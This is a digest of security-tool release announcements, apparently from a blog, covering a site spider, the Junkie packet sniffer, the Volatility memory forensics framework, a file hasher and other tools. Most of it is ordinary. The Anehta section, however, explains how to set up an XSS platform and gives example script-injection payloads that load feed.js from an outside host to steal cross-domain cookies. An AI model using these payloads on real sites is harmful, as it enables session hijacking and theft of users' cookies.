sitecheck : Modular web site spider for web developers.

Spiders a website and logs many common problems including missing resources (HTTP 400), server errors (HTTP 500), slow pages, looping redirects, missing meta tags, duplicate content and potential SQL injection/cross-site scripting (XSS) vulnerabilities.

Various informational modules are also available including the logging of email addresses, IP addresses, comments in the HTML, spelling mistakes, W3C validation errors, accessibility issues, and low scores on the Flesch Reading Ease test.

Features

  • Authentication by HTTP form submission
  • Suspend and resume
  • Download and save a site
  • Highly configurable with support for multiple profiles
  • Modular processing of responses
  • Checks for some common DNS issues
  • Includes inbound links from search engines

Download Right Here | read more in here

Advertisements

Update Junkie the network sniffer v-2.2.0

Release Notes v-2.2.0 : Faster deadlock detection. Can replay pcaps in a loop. Can now pass nettrack values to a guile action. More documentation (in doc/). Support for multi-line HTTP headers. Guile files are pre-compiled before installation (see ./configure –help)


Junkie is a real-time packet sniffer and analyzer. It is modular enough to accomplish many different tasks. It can be a helpful companion to the modern network administrator and analyst. Compared to previously available tools, junkie lies in between tcpdump and wireshark. Unlike tcpdump, its purpose is to parse protocols of any depth; unlike wireshark, though, it is designed to analyze traffic in real-time and so cannot parse traffic as completely as wireshark does. In addition, its design encompasses extendability and speed. It has a plug-in system and high-level extension language that eases the development and combination of new functionalities; threaded packet capture and analysis for handling of high bandwidth networks; and a modular architecture to ease the addition of any protocol layer. It is based on libpcap for portability, and well-tested on professional settings.
Download : https://github.com/securactive/junkie/zipball/release/2.2.0
Read more right here : https://github.com/securactive/junkie
Our port Before : https://seclist.wordpress.com/2012/02/14/junkiethesniffer-v1-5-0-released/

password420 : Strong Password Generator Online – Easy to remember Strong Passwords

A strong password should have;

Length – A strong password is atleast 10 characters or more in length.

Complexity – A strong password should not be words from dictionary, names and must be a combination of upper and lower case alphabets, numbers, special characters like $,@ etc

Variation – Change your passwords often atleast once every month

Variety – Do not use the same password in all the online sites.

But the problem is for humans to remember a strong password.

The project solves this by creating a password depot that allows the users to generate and retrieve their strong password using a userid and a 4 character passkey.
Download in here | read more right here

update SecureSystems-Analyst Antimalware Toolkit v-8.8.2012

SecureSystems-Analyst Antimalware Toolkit is a toolkit based on Xubuntu 12.04 for malware analysis and collection purposes.
Features

  • Designed for reverse engineering malware. Contains many Firefox extensions and Tor Browser.
  • Uses XFCE to provide a customizable desktop that’s not too heavy on resources.
  • Also has some network analysis tools such as WireShark and Zenmap.
  • Live CD/Installer available only. Note does not fit onto a standard CD.

This toolkit is provided to help researchers reverse engineer malware.
It runs a customized Xubuntu 12.04 i386 Linux OS.
This package includes both a live dvd and installer.

Login Name: securesystems-analyst
Login Password: analyst

Root Account Password: analyst

System Requirements

VMware Workstation 8*
2GB of free ram.
25GB of free disk space.

*Other Virtual Environments(VirtualBox, Virtual PC etc) have not been tested.

Download : 8.8.2012.zipx (1.6 GB) 
Find Other version |
read more in here : http://www.cyberstealthlabs.org/projects/csl-antimalware-toolkit

Our post Before : https://seclist.wordpress.com/2012/07/13/securesystems-analyst-toolkit/

Anehta V-0.6 released.

Anehta is Web Application tools for Security Audit.

 

=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS
=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in “server/class/auth_Class.php” file.
Default username is “admin” and default password is “123456”.
4. If you want to send mail, modify “server/mail.php” file to your own mail server or mailbox.
=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the “anehtaurl” as the url where your anehta is.
For example: “http://www.a.com/anehta”.
3. You should also input the boomerang src and boomerang target.
boomerang src is usually the same page where you put your feed.js is.
For example: boomerang src maybe: “http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>”.

boomerang target must be the page where you want to steal cross domain cookie.
For example: boomerang target maybe: “http://www.alimafia.com/xssDemo.html#’><script src=http://www.a.com/anehta/feed.js></script><‘”.

You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
There is also a demo page in the directory which is “demo.html”

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

Downnload In here | Read more Right here

 

Update volatility v2.1 – An advanced memory forensics framework

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research.

What’s new in 2.0 Highlights of this release include:

  •     Restructured and depolluted namespace
  •     Usage and Development Documentation
  •     New Configuration Subsystem
  •     New Caching Subsystem
  •     New Pluggable address spaces with automated election
  •     New Address Spaces (i.e. EWF, Firewire)
  •     Updated Object Model and Profile Subsystems (VolatilityMagic)
  •     Support for Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7
  •     Updated Scanning Framework
  •     Volshell integration
  •     Over 40 new plugins!

 

Volatility supports investigations of the following x86 bit memory images:

* Microsoft Windows XP Service Pack 2 and 3
* Microsoft Windows 2003 Server Service Pack 0, 1 and 2
* Microsoft Vista Service Pack 0, 1 and 2
* Microsoft 2008 Server Service Pack 1 and 2 (there is no SP 0)
* Microsoft Windows 7 Service Pack 0 and 1

Volatility currently provides the following extraction capabilities for
memory samples:

– Image date and time
– Running processes
– Open network sockets
– Open network connections
– DLLs loaded for each process
– Open files for each process
– Open registry keys for each process
– OS kernel modules
– Mapping physical offsets to virtual addresses
– Virtual Address Descriptor information
– Addressable memory for each process
– Memory maps for each process
– Extract executable samples
– Scanning examples: processes, threads,
sockets, connections, modules

Download Right Here  | Read more in here
Our Post Before : https://seclist.wordpress.com/2011/12/06/volatility-v2-0-an-advanced-memory-forensics-framework-release/

DeepDigest – A file integrity checker, Similar to md5deep/sha256deep but in a GUI.

DeepDigest is a file integrity checker. It calculates hash values for selected files and allows the files to be verified against those values. Its GUI interface provides several features not found in similar programs. Roughly speaking, DeepDigest is a GUI version of md5deep/sha256deep.

Platform Unix/Linux

To use DeepDigest, a user first creates a “job”. This specifies the directory to be hashed and the hash algorithm to be used (MD5 or SHA-256). The results of a job run are saved to an archive file. Subsequent runs of the job are compared to this archive to determine which files have changed. New, deleted, renamed or moved files are also reported. The results view may be sorted, filtered and searched.

Results may be exported in csv format or to another installation of DeepDigest.

DeepDigest may be run from the command line and from scripts. The name of the job to be run is passed as a command line argument.

DeepDigest is written in C++ and uses the Qt libraries.

Download in here | Read more right here